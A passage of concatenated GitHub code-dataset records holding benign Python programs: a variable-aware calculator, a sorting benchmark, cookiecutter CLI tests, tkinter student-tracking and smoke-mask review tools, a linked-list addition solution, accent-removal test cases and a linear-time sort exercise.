''.join(last_part)\n if key in variables:\n variables[variable] = variables[key]\n else:\n print('Unknown variable')\n return False\n elif re.match('^[a-zA-Z0-9]+$', ''.join(last_part)):\n print('Invalid assignment')\n return False\n elif re.match('^[a-zA-Z0-9]+$', ''.join(first_part)):\n print('Invalid identifier')\n return False\n\n\ndef display_var_value(user_input, variables):\n if user_input in variables:\n print(variables[user_input])\n else:\n print('Unknown variable')\n\n\ndef counvert_variable_to_number(input_arr, variables):\n for i, el in enumerate(input_arr):\n if el in variables:\n input_arr[i] = int(variables[el])\n elif not el.isdigit() and el not in ['^', '+', '-', '*', '/', '(', ')']:\n print('Unknown variable')\n break\n return input_arr\n\n\ndef convery_to_array_2(str):\n op = ['^', '+', '-', '*', '/', '(', ')']\n index = 0\n res = []\n for i in range(len(str)):\n if str[i] in op:\n res.append(str[index: i])\n 
res.append(str[i])\n index = i + 1\n res.append(str[index:len(str)])\n\n res = [x.strip() for x in res if x.strip() != '']\n\n return res\n\n\ndef infixToPostfix(infixexpr_arr):\n prec = {}\n prec[\"*\"] = 3\n prec[\"/\"] = 3\n prec[\"+\"] = 2\n prec[\"-\"] = 2\n prec[\"(\"] = 1\n opStack = Stack()\n postfixList = []\n tokenList = infixexpr_arr\n\n for token in tokenList:\n token = token.strip() # '33 ' -> '33'\n if re.match('^[a-zA-Z]+$', token) or re.match('^[0-9]+$', token):\n postfixList.append(token)\n elif re.match('^[a-zA-Z0-9]+$', token): # 'a22'\n print('Invalid identifier')\n break\n elif token == '(':\n opStack.push(token)\n elif token == ')':\n topToken = opStack.pop()\n while topToken != '(':\n postfixList.append(topToken)\n topToken = opStack.pop()\n else:\n while (not opStack.isEmpty()) and (prec[opStack.peek()] >= prec[token]):\n postfixList.append(opStack.pop())\n opStack.push(token)\n\n while not opStack.isEmpty():\n postfixList.append(opStack.pop())\n return postfixList\n\n\ndef calculate_result(postfix):\n op = ['^', '+', '-', '*', '/']\n equation = deque()\n\n for el in postfix:\n equation.append(el)\n\n for i, el in enumerate(equation):\n if el not in op:\n equation[i] = int(el)\n\n que_helper = deque()\n result = 0\n\n if len(equation) == 1:\n result = equation.pop()\n else:\n while len(equation) > 0:\n x = equation.popleft()\n if x not in op:\n que_helper.appendleft(x)\n else:\n b = que_helper.popleft()\n a = que_helper.popleft()\n if x == '^':\n result = a ** b\n elif x == '*':\n result = a * b\n elif x == '/':\n result = a / b\n elif x == '+':\n result = a + b\n elif x == '-':\n result = a - b\n que_helper.appendleft(result)\n\n print(int(result))\n return result\n\n\n###########################################\nvariables = {}\nwhile True:\n\n user_input = input().strip()\n\n if user_input != '':\n if user_input[0] == '+':\n user_input = convert_positive_num(user_input)\n\n if check_if_input_correct(user_input):\n if user_input == '/exit':\n print('Bye!')\n break\n\n elif user_input == '/help':\n print('You can use +. 
-, /, *, ^ and define variables in this calculator')\n\n elif len(user_input) > 0:\n if '=' in user_input:\n input_arr = change_input_to_arr(user_input)\n check_input_correctness(input_arr, variables)\n\n elif re.match('^[a-zA-Z]+$', user_input):\n display_var_value(user_input, variables)\n\n elif '=' not in user_input:\n numbers_from_user = convery_to_array_2(user_input)\n equation = check_the_sign(numbers_from_user)\n numbers_equation = counvert_variable_to_number(equation, variables)\n numbers_equation = [str(x) for x in numbers_equation]\n postfix = infixToPostfix(numbers_equation)\n calculate_result(postfix)\n\n else:\n print('Invalid expression')\n\n\n","repo_name":"KatarzynaKnapik/advanced_calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72250283930","text":"import random # Imports the random module for generating random numbers\nimport time # Imports the time module for measuring the execution time\nimport matplotlib.pyplot as plt # Imports the matplotlib.pyplot module for creating plots\nimport pandas as pd # Imports the pandas module for data manipulation and analysis\n\ndef bubblesort(arr):\n n = len(arr) # Gets the length of the array\n for i in range(n): # Iterates over each element in the array\n for j in range(0, n-i-1): # Iterates from the first element to the (n-i-1)-th element\n if arr[j] > arr[j+1]: # Checks if the current element is greater than the next element\n # Swaps the elements if they are in the wrong order\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\ndef selectionsort(arr):\n n = len(arr) # Gets the length of the array\n for i in range(n): # Iterates over each element in the array\n min_idx = i # Assumes the current index has the minimum element\n \n # Finds the index of the minimum element in the unsorted portion of the array\n for j in range(i+1, n):\n if arr[j] < arr[min_idx]: # Compares the current element with the assumed minimum element\n min_idx = j # Updates the index of the minimum element\n \n # Swaps the current element with the minimum element\n arr[i], arr[min_idx] = arr[min_idx], arr[i]\n \n\ndef insertionsort(arr):\n for i in range(1, len(arr)): # Iterates over each element in the array starting from the second element\n key = arr[i] # Stores the current element as the key\n j = i - 1 # Sets the initial index of the previous element\n\n # Moves elements of arr[0...i-1], that are greater than key, to one position ahead of their current position\n while j >= 0 and arr[j] > key:\n arr[j + 1] = arr[j] # Shifts elements to the right\n j -= 1 # Decrements the index\n\n arr[j + 1] = key # Places the key at its correct position in the sorted subarray\n\ndef countingsort(array, max_val):\n m = max_val + 1 # Determines the size of the counting array\n\n count = [0] * m # Creates a counting array initialized with zeros\n\n for a in array:\n # Counts occurrences of each element in array\n count[a] += 1 # Increments the count for the current element\n\n i = 0 # Initialises the index for the sorted array\n\n for a in range(m): # Iterates over the counting array\n for c in range(count[a]): # Repeats for the count of each element in the counting array\n array[i] = a # Assigns the element to the sorted array\n i += 1 # Increments the index of the sorted array\n\n \ndef mergesort(array):\n print(\"Splitting \", array) # Prints a message indicating the current split operation\n\n if len(array) > 1: # 
Checks if there is more than one element in the list\n mid = len(array) // 2 # Calculates the middle index\n lefthalf = array[:mid] # Divides the list into left half\n righthalf = array[mid:] # Divides the list into right half\n\n mergesort(lefthalf) # Recursively calls mergeSort on the left half\n mergesort(righthalf) # Recursively calls mergeSort on the right half\n\n i = 0 # Index for the left half\n j = 0 # Index for the right half\n k = 0 # Index for the original list\n\n while i < len(lefthalf) and j < len(righthalf):\n # Compares the elements from the left and right halves\n if lefthalf[i] <= righthalf[j]:\n array[k] = lefthalf[i] # Places the smaller element into the original list\n i += 1\n else:\n array[k] = righthalf[j] # Places the smaller element into the original list\n j += 1\n k += 1\n\n while i < len(lefthalf):\n # Copies any remaining elements from the left half to the original list\n array[k] = lefthalf[i]\n i += 1\n k += 1\n\n while j < len(righthalf):\n # Copies any remaining elements from the right half to the original list\n array[k] = righthalf[j]\n j += 1\n k += 1\n\n\ndef generate_random_array(n):\n return [random.randint(0, 1000) for _ in range(n)] # Generates a list of random integers between 0 and 1000\n\n\n# Sorting algorithms\n\ndef benchmark_sorting_algorithms():\n algorithms = {\n \"Bubble Sort\": bubblesort,\n \"Selection Sort\": selectionsort,\n \"Insertion Sort\": insertionsort,\n \"Counting Sort\": countingsort,\n \"Merge Sort\": mergesort\n }\n\n input_sizes = [100, 250, 500, 750, 1000, 1250, 2500, 3750, 5000, 6250, 7500, 8750, 10000] # List of input sizes\n results = {algorithm: [] for algorithm in algorithms} # Creates an empty dictionary to store the results\n output_results = [] # To store the results in the desired format\n\n for size in input_sizes:\n for algorithm in algorithms:\n arr = generate_random_array(size) # Generates a random array of the given size\n start_time = time.time() # Records the start time\n if algorithm == \"Counting Sort\":\n max_val = max(arr) # Finds the maximum value in the array\n algorithms[algorithm](arr, max_val) # Calls the counting sort algorithm with the maximum value\n else:\n algorithms[algorithm](arr) # Calls the sorting algorithm\n end_time = time.time() # Records the end time\n total_time = (end_time - start_time) * 1000 # Calculates the total execution time in milliseconds\n avg_time = total_time / 10.0 # Calculates the average execution time over 10 iterations\n results[algorithm].append(avg_time) # Adds the average time to the results dictionary\n\n # Stores the results in the desired format\n for algorithm in algorithms:\n output_results.append([f\"{algorithm}\"] + [f\"{time:.3f}\" for time in results[algorithm]])\n\n # Prints the results\n columns = [\"Algorithm\"] + [str(size) for size in input_sizes]\n df = pd.DataFrame(output_results, columns=columns)\n print(df.to_string(index=False)) # Print the DataFrame without the index\n\n # Plots the results\n fig, ax = plt.subplots()\n ax.set_title(\"Sorting Algorithms Benchmarking\")\n ax.set_xlabel(\"Input Size (n)\")\n ax.set_ylabel(\"Running Time (milliseconds)\")\n\n for algorithm in algorithms:\n ax.plot(input_sizes, results[algorithm], label=algorithm) # Plot the running time for each algorithm\n\n ax.legend() # Shows the legend\n plt.savefig('sorting_algorithms.png') # Saves the plot to a file\n plt.show() # Displays the plot\n\n\nbenchmark_sorting_algorithms() # Runs the benchmarking 
function\n","repo_name":"Tanjasta/My-work","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5119229484","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_cookiecutter_invocation\n----------------------------\n\nTests to make sure that cookiecutter can be called from the cli without\nusing the entry point set up for the package.\n\"\"\"\n\nimport os\nimport pytest\nimport subprocess\nimport sys\n\nfrom cookiecutter import utils\n\n\ndef test_should_raise_error_without_template_arg(capfd):\n with pytest.raises(subprocess.CalledProcessError):\n subprocess.check_call(['python', '-m', 'cookiecutter.cli'])\n\n _, err = capfd.readouterr()\n exp_message = 'Error: Missing argument \"template\".'\n assert exp_message in err\n\n\n@pytest.fixture\ndef project_dir(request):\n \"\"\"Remove the rendered project directory created by the test.\"\"\"\n rendered_dir = 'fake-project-templated'\n\n def remove_generated_project():\n if os.path.isdir(rendered_dir):\n utils.rmtree(rendered_dir)\n request.addfinalizer(remove_generated_project)\n\n return rendered_dir\n\n\n@pytest.mark.usefixtures('clean_system')\ndef test_should_invoke_main(monkeypatch, project_dir):\n monkeypatch.setenv('PYTHONPATH', '.')\n\n subprocess.check_call([\n sys.executable,\n '-m',\n 'cookiecutter.cli',\n 'tests/fake-repo-tmpl',\n '--no-input'\n ])\n\n assert os.path.isdir(project_dir)\n","repo_name":"rmedaer/deb-cookiecutter","sub_path":"tests/test_cookiecutter_invocation.py","file_name":"test_cookiecutter_invocation.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"917535485","text":"# Python ver: 3.8.3\n#\n# Author: Angel Padilla\n#\n# Purpose: Practice building a app that tracks student infomation\n#\n# Tested OS:` This code was tested for use with Windows 10.\nfrom tkinter import *\nimport tkinter as tk\n\n# importing other modules\nimport Stu_Track_GUI\nimport Stu_Track_func\n\n\nclass ParentWindow(Frame):\n def __init__(self, master):\n Frame.__init__(self, master)\n\n # Define master frame\n self.master = master\n self.master.resizable(width=False, height=False)\n self.master.geometry('700x500')\n self.master.title(\"Student Tracking\")\n self.master.configure(bg=\"forestgreen\")\n\n #loads GUI\n Stu_Track_GUI.load_gui(self)\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n App = ParentWindow(root)\n root.mainloop()","repo_name":"ajustinpadilla/python_projects","sub_path":"Student_Tracking/Stu_Track_main.py","file_name":"Stu_Track_main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70472685853","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTESTS is a dict with all you tests.\nKeys for this will be categories' names.\nEach test is dict with\n \"input\" -- input data for user function\n \"answer\" -- your right answer\n \"explanation\" -- not necessary key, it's using for additional info in animation.\n\"\"\"\n\n\nTESTS = {\n \"Basics\": [\n {\n \"input\": u\"préfèrent\",\n \"answer\": u\"preferent\",\n },\n {\n \"input\": u\"loài trăn lớn\",\n \"answer\": u\"loai tran lon\",\n },\n {\n \"input\": u\"König\",\n \"answer\": u\"Konig\",\n },\n {\n \"input\": u\"完好無缺\",\n \"answer\": u\"完好無缺\",\n },\n {\n \"input\": u\"àèìǹòùẁỳÀÈÌǸÒÙẀỲ\",\n \"answer\": u\"aeinouwyAEINOUWY\",\n },\n 
{\n \"input\": u\"ằẰ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ầẦềỀồỒ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ờỜừỪ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ȁȅȉȍȑȕȀȄȈȌȐȔ\",\n \"answer\": u\"aeioruAEIORU\",\n },\n {\n \"input\": u\"áćéǵíḱĺḿńóṕŕśúẃýźÁĆÉǴÍḰĹḾŃÓṔŔŚÚẂÝŹ\",\n \"answer\": u\"acegiklmnoprsuwyzACEGIKLMNOPRSUWYZ\",\n },\n {\n \"input\": u\"ắẮ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ấẤếẾốỐ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ớỚứỨ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"őűŐŰ\",\n \"answer\": u\"ouOU\",\n },\n {\n \"input\": u\"âĉêĝĥîĵôŝûŵŷẑÂĈÊĜĤÎĴÔŜÛŴŶẐ\",\n \"answer\": u\"aceghijosuwyzACEGHIJOSUWYZ\",\n },\n {\n \"input\": u\"ǎǍčČďĎěĚǧǦȟȞǐǏǰǩǨľĽňŇǒǑřŘšŠťŤǔǓžŽ\",\n \"answer\": u\"aAcCdDeEgGhHiIjkKlLnNoOrRsStTuUzZ\",\n },\n {\n \"input\": u\"ăĂĕĔğĞḫḪĭĬŏŎŭŬ\",\n \"answer\": u\"aAeEgGhHiIoOuU\",\n },\n {\n \"input\": u\"ȃȂȇȆȋȊȏȎȗȖȓȒ\",\n \"answer\": u\"aAeEiIoOuUrR\",\n },\n {\n \"input\": u\"ãÃẽẼĩĨñÑõÕũŨṽṼỹỸ\",\n \"answer\": u\"aAeEiInNoOuUvVyY\",\n },\n {\n \"input\": u\"ẵẴ\",\n \"answer\": u\"aA\",\n },\n ],\n \"Extra\": [\n {\n \"input\": u\"ẫẪễỄỗỖ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ỡỠữỮ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ĀāĒēḠḡĪīŌōŪūȲȳ\",\n \"answer\": u\"AaEeGgIiOoUuYy\",\n },\n {\n \"input\": u\"ḆḇḎḏẖḴḵḺḻṈṉṞṟṮṯẔẕ\",\n \"answer\": u\"BbDdhKkLlNnRrTtZz\",\n },\n {\n \"input\": u\"äëḧïöẗüẅẍÿÄËḦÏÖÜẄẌŸ\",\n \"answer\": u\"aehiotuwxyAEHIOUWXY\",\n },\n {\n \"input\": u\"åÅůŮẘẙ\",\n \"answer\": u\"aAuUwy\",\n },\n {\n \"input\": u\"ȧȦḃḂċĊḋḊėĖḟḞġĠḣḢİṁṀṅṄȯȮṗṖṙṘṡṠṫṪẇẆẋẊẏẎżŻ\",\n \"answer\": u\"aAbBcCdDeEfFgGhHImMnNoOpPrRsStTwWxXyYzZ\",\n },\n {\n \"input\": u\"ẠạḄḅḌḍẸẹḤḥỊịḲḳḶḷṂṃṆṇỌọṚṛṢṣṬṭỤụṾṿẈẉỴỵẒẓ\",\n \"answer\": u\"AaBbDdEeHhIiKkLlMmNnOoRrSsTtUuVvWwYyZz\",\n },\n {\n \"input\": u\"ąĄçÇḑḐęĘģĢḩḨįĮķĶļĻņŅǫǪŗŖşŞţŢųŲ\",\n \"answer\": u\"aAcCdDeEgGhHiIkKlLnNoOrRsStTuU\",\n },\n {\n \"input\": u\"ảẢẻẺỉỈỏỎủỦỷỶ\",\n \"answer\": u\"aAeEiIoOuUyY\",\n },\n {\n \"input\": u\"ẳẲ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ẩẨểỂổỔ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ởỞửỬ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"ặẶ\",\n \"answer\": u\"aA\",\n },\n {\n \"input\": u\"ậẬệỆộỘ\",\n \"answer\": u\"aAeEoO\",\n },\n {\n \"input\": u\"ợỢựỰ\",\n \"answer\": u\"oOuU\",\n },\n {\n \"input\": u\"蟒蛇\",\n \"answer\": u\"蟒蛇\",\n },\n {\n \"input\": u\" \",\n \"answer\": u\" \",\n },\n {\n \"input\": u\"!@#$%^&*()_+,./<>?\",\n \"answer\": u\"!@#$%^&*()_+,./<>?\",\n },\n {\n \"input\": u\"\",\n \"answer\": u\"\",\n },\n ]\n}\n","repo_name":"buganini/checkio-task-remove-accents","sub_path":"verification/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"33362171454","text":"import data_tools\nimport json\nimport numpy as np\nimport visuals\nimport os\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nimport cv2\nimport tkinter.font as font\n\n\nclass manual_evaluation_ui:\n\n def __init__(self, BLACKLIST_FP):\n\n self.BLACKLIST_FP = BLACKLIST_FP\n\n self.window = tk.Tk()\n\n # Set window dimensions (width x height)\n self.window_width = 1410\n self.window_height = 700\n\n # Get the screen width and height\n self.screen_width = self.window.winfo_screenwidth()\n self.screen_height = self.window.winfo_screenheight()\n\n # Calculate the x and y position to center the window on the screen\n self.x_position = (self.screen_width - 
self.window_width) // 2\n self.y_position = (self.screen_height - self.window_height) // 2\n\n # Set the window size and position\n self.window.geometry(f\"{self.window_width}x{self.window_height}+{self.x_position}+{self.y_position}\")\n\n def build(self, img, mask, combined, res, img_fp, mask_fp, n_smoke_pixels, contains_smoke, completion_status):\n\n def top_text():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n text_frame_width = self.window_width - right_margin - left_margin\n text_frame_height = 90 - bottom_margin - top_margin\n\n text_frame = tk.Frame(self.window, width = text_frame_width, height = text_frame_height, bg = 'white')\n text_frame.place(x = left_margin, y = top_margin)\n\n text_label = tk.Label(text_frame, text = 'Image path: %s\\nMask path: %s'%(img_fp, mask_fp), wraplength = text_frame_width, anchor = 'w', justify = 'left')\n text_label.pack()\n\n def left_text():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n text_frame_width = self.window_width - combined_outer_frame_shape[0] - 3 * right_margin - left_margin\n text_frame_height = self.window_width - 4 * 90 - 40\n\n text_frame = tk.Frame(self.window, width = text_frame_width, height = text_frame_height, bg = 'white')\n text_frame.place(x = left_margin, y = 90)\n\n text_label = tk.Label(text_frame, text = 'Resolution: %dx%d\\nContains Smoke: %s\\nNumber of smoke px:\\n%d\\nStatus: %.2f%%'%(res[1], res[0], contains_smoke, n_smoke_pixels, completion_status), wraplength = text_frame_width, anchor = 'w', justify = 'left')\n text_label.pack()\n\n def upper_button():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n button_frame_width = 170\n button_frame_height = 100\n\n button_frame = tk.Frame(self.window, width = button_frame_width, height = button_frame_height)\n button_frame.place(x = left_margin, y = self.window_height - 2* (button_frame_height + bottom_margin))\n\n button = tk.Button(button_frame, text = 'NEXT [N]', width = button_frame_width // 10, height = button_frame_height // 10 - 5, bg = 'green', command = Next, font = DefaultFont, wraplength = button_frame_width - 20)\n button.place(x = -33, y = -8)\n\n def bottom_button():\n\n top_margin = left_margin = right_margin = bottom_margin = 10\n button_frame_width = 170\n button_frame_height = 100\n\n button_frame = tk.Frame(self.window, width = button_frame_width, height = button_frame_height)\n button_frame.place(x = left_margin, y = self.window_height - (button_frame_height + bottom_margin))\n\n button = tk.Button(button_frame, text = 'ADD TO BLACKLIST [B]', width = button_frame_width // 10, height = button_frame_height // 10 - 5, bg = 'maroon', command = Add2Blacklist, font = DefaultFont, wraplength = button_frame_width - 30)\n button.place(x = -33, y = -8)\n\n def Add2Blacklist():\n\n with open(self.BLACKLIST_FP, mode = 'a') as file:\n file.write(img_fp + ', ' + mask_fp + '\\n')\n\n Next()\n\n def Next():\n self.window.quit()\n return False\n\n def event_handler(event):\n if event.char == 'q':\n exit()\n elif event.char == 'n':\n Next()\n elif event.char == 'b':\n Add2Blacklist()\n\n DefaultFont = font.Font(family = 'Lato', size = '15', weight = 'bold')\n\n ## ! 
Build right image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n combined_shape = [combined.shape[1], combined.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n combined_outer_frame_shape = (800, 600)\n\n outer_combined_frame = tk.Frame(self.window, width = combined_outer_frame_shape[0], height = combined_outer_frame_shape[1], bg = 'black')\n outer_combined_frame.place(x = self.window_width - combined_outer_frame_shape[0] - right_margin, y = self.window_height - combined_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n combined_aspect_ratio = combined_shape[1] / combined_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n combined_shape[0] = combined_outer_frame_shape[0]\n combined_shape[1] = int(combined_aspect_ratio * combined_shape[0])\n if combined_shape[1] > combined_outer_frame_shape[1]:\n combined_shape[1] = combined_outer_frame_shape[1]\n combined_shape[0] = int(combined_shape[1] / combined_aspect_ratio)\n combined = cv2.resize(combined, (combined_shape[0], combined_shape[1]))\n combined = Image.fromarray(combined)\n combined_tk = ImageTk.PhotoImage(combined)\n combined_inner_frame_shape = \\\n (\n combined_shape[0],\n combined_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_combined_frame = tk.Frame(outer_combined_frame, width = combined_inner_frame_shape[0], height = combined_inner_frame_shape[1], bg=\"white\")\n inner_combined_frame.place(x = combined_outer_frame_shape[0] // 2 - combined_inner_frame_shape[0] // 2, y = combined_outer_frame_shape[1] // 2 - combined_inner_frame_shape[1] // 2)\n\n combined_label = tk.Label(inner_combined_frame, image = combined_tk, bg = 'white')\n combined_label.grid(column = 0, row = 0)\n\n ## ! Build right image frame: End\n\n ## ! Build left top image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n img_shape = [img.shape[1], img.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n img_outer_frame_shape = (400, 300)\n\n outer_img_frame = tk.Frame(self.window, width = img_outer_frame_shape[0], height = img_outer_frame_shape[1], bg = 'black')\n outer_img_frame.place(x = self.window_width - img_outer_frame_shape[0] - 2 * right_margin - combined_outer_frame_shape[0], y = self.window_height - 2* img_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n img_aspect_ratio = img_shape[1] / img_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n img_shape[0] = img_outer_frame_shape[0]\n img_shape[1] = int(img_aspect_ratio * img_shape[0])\n if img_shape[1] > img_outer_frame_shape[1]:\n img_shape[1] = img_outer_frame_shape[1]\n img_shape[0] = int(img_shape[1] / img_aspect_ratio)\n img = cv2.resize(img, (img_shape[0], img_shape[1]))\n img = Image.fromarray(img)\n img_tk = ImageTk.PhotoImage(img)\n img_inner_frame_shape = \\\n (\n img_shape[0],\n img_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. 
Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_img_frame = tk.Frame(outer_img_frame, width = img_inner_frame_shape[0], height = img_inner_frame_shape[1], bg=\"white\")\n inner_img_frame.place(x = img_outer_frame_shape[0] // 2 - img_inner_frame_shape[0] // 2, y = img_outer_frame_shape[1] // 2 - img_inner_frame_shape[1] // 2)\n\n img_label = tk.Label(inner_img_frame, image = img_tk, bg = 'white')\n img_label.grid(column = 0, row = 0)\n\n ## ! Build left top image frame: End\n\n ## ! Build left bottom image frame: Begin\n\n ## In this method, all shapes are considered as (width, height)\n mask_shape = [mask.shape[1], mask.shape[0]]\n\n right_margin = 10\n bottom_margin = 10\n\n mask_outer_frame_shape = (400, 300)\n\n outer_mask_frame = tk.Frame(self.window, width = mask_outer_frame_shape[0], height = mask_outer_frame_shape[1], bg = 'black')\n outer_mask_frame.place(x = self.window_width - mask_outer_frame_shape[0] - 2 * right_margin - combined_outer_frame_shape[0], y = self.window_height - mask_outer_frame_shape[1] - bottom_margin)\n\n ## Resize image while keeping aspect ratio\n mask_aspect_ratio = mask_shape[1] / mask_shape[0]\n\n ## Adjust image and inner frame resolution, to fit exactly inside the outer frame\n mask_shape[0] = mask_outer_frame_shape[0]\n mask_shape[1] = int(mask_aspect_ratio * mask_shape[0])\n if mask_shape[1] > mask_outer_frame_shape[1]:\n mask_shape[1] = mask_outer_frame_shape[1]\n mask_shape[0] = int(mask_shape[1] / mask_aspect_ratio)\n mask = cv2.resize(mask, (mask_shape[0], mask_shape[1]))\n mask = Image.fromarray(255 * mask)\n mask_tk = ImageTk.PhotoImage(mask)\n mask_inner_frame_shape = \\\n (\n mask_shape[0],\n mask_shape[1]\n )\n\n ## Creating a child frame inside the outer image frame. Placing coordinate system places (0, 0) at the upper left edge of the outer frame.\n inner_mask_frame = tk.Frame(outer_mask_frame, width = mask_inner_frame_shape[0], height = mask_inner_frame_shape[1], bg=\"white\")\n inner_mask_frame.place(x = mask_outer_frame_shape[0] // 2 - mask_inner_frame_shape[0] // 2, y = mask_outer_frame_shape[1] // 2 - mask_inner_frame_shape[1] // 2)\n\n mask_label = tk.Label(inner_mask_frame, image = mask_tk, bg = 'white')\n mask_label.grid(column = 0, row = 0)\n\n ## ! Build left bottom image frame: End\n\n ## Top text\n top_text()\n\n ## Left text\n left_text()\n\n ## Bottom button\n bottom_button()\n\n ## Bottom button\n upper_button()\n\n self.window.bind('', event_handler)\n ## Must be on the same function otherwise garbage collector can ruin features\n self.window.mainloop()\n\n return True\n\ndef manual_evaluation_sequence(BLACKLIST_FP = '../blacklisted_instances.list', paths_fp = '../paths.json'):\n\n def session_save(mask_fp):\n\n with open(session_fp, 'w') as file:\n file.write(mask_fp)\n\n with open(file = paths_fp, mode = 'r') as json_file:\n paths_json = json.load(json_file)\n\n session_fp = '../session.path'\n\n if os.path.isfile(session_fp):\n print('W: Previous session found')\n start_over_trigger = input('Start over? 
Yes [Y] or No [N]\\n> ')\n while start_over_trigger not in {'Y', 'N'}:\n start_over_trigger = input('Enter a proper answer\\n> ')\n start_over_trigger = start_over_trigger == 'Y'\n if start_over_trigger:\n if os.path.isfile(BLACKLIST_FP):\n os.remove(BLACKLIST_FP)\n os.remove(session_fp)\n\n if os.path.isfile(session_fp):\n print('Loading previous session')\n with open(session_fp, 'r') as file:\n mask_session_fp = file.read()\n load_session_trigger = True\n else:\n print('Creating a new session')\n load_session_trigger = False\n\n dataset_dp = paths_json['ssmoke_data_dp']\n if dataset_dp[-1] != '/': dataset_dp += '/'\n\n data = data_tools.SegmData(dataset_dp = dataset_dp)\n\n ui = manual_evaluation_ui(BLACKLIST_FP = BLACKLIST_FP)\n\n while next(data):\n\n img = data.img\n mask = data.mask\n res = img.shape[:-1]\n img_fp = data.img_fp\n mask_fp = data.mask_fp\n n_smoke_pixels = data.n_smoke_pixels\n contains_smoke = 'Positive' if n_smoke_pixels > 0 else 'Negative'\n\n if load_session_trigger:\n if mask_fp == mask_session_fp:\n load_session_trigger = False\n else:\n continue\n\n combined = visuals.combine_img_mask(img = img, mask = mask)\n\n completion_status = 100*(data.INSTANCE_IDX+1)/data.n_instances\n\n ui.build(img = img, mask = mask, combined = combined, res = res, img_fp = img_fp, mask_fp = mask_fp, n_smoke_pixels = n_smoke_pixels, contains_smoke = contains_smoke, completion_status = completion_status)\n\n print('Completion status: %.2f%%'%(completion_status))\n\n session_save(mask_fp = mask_fp)\n\n\nif __name__ == '__main__':\n\n manual_evaluation_sequence()\n\n","repo_name":"fl0wxr/SmokeSegmenter","sub_path":"src/manual_evaluation.py","file_name":"manual_evaluation.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21841103210","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def addTwoNumbers(self, a1, a2):\n if a1 == None:\n return a2\n \n if a2 == None:\n return a1\n \n sval = a1.val + a2.val\n if sval < 10:\n answer = ListNode(sval)\n answer.next = self.addTwoNumbers(a1.next, a2.next)\n return answer\n else:\n rval = a1.val + a2.val-10\n answer = ListNode(rval)\n answer.next = self.addTwoNumbers(ListNode(1), self.addTwoNumbers(a1.next, a2.next))\n return answer\n","repo_name":"leoh192/my-learning-notes","sub_path":"Leetcode/2_Add Two Numbers_06170231.py","file_name":"2_Add Two Numbers_06170231.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18169853081","text":"\"\"\"\nproblem2.py\nWritten By: Devon Bray for CS2223\n\nSorts a list containing values between 0 and 1000 in linear time\n\nTo run: python problem2.py\n\"\"\"\n\nfrom random import sample\n\n\ndef order_n_sort(items):\n\n d = {}\n\n for item in items:\n while True: # will re-try if the item isn't found\n try:\n d[item].append(item)\n break\n except KeyError:\n d[item] = []\n\n sorted_list = []\n\n for x in range(1000):\n try:\n sorted_list += d[x]\n except KeyError:\n pass # ignore the items that don't show up\n\n return sorted_list\n\nif __name__ == \"__main__\":\n unsorted_randoms = sample(range(1000), 100)\n print(\"Unsorted: \" + str(unsorted_randoms))\n\n sorted_randoms = order_n_sort(unsorted_randoms)\n print(\"Sorted: \" + 
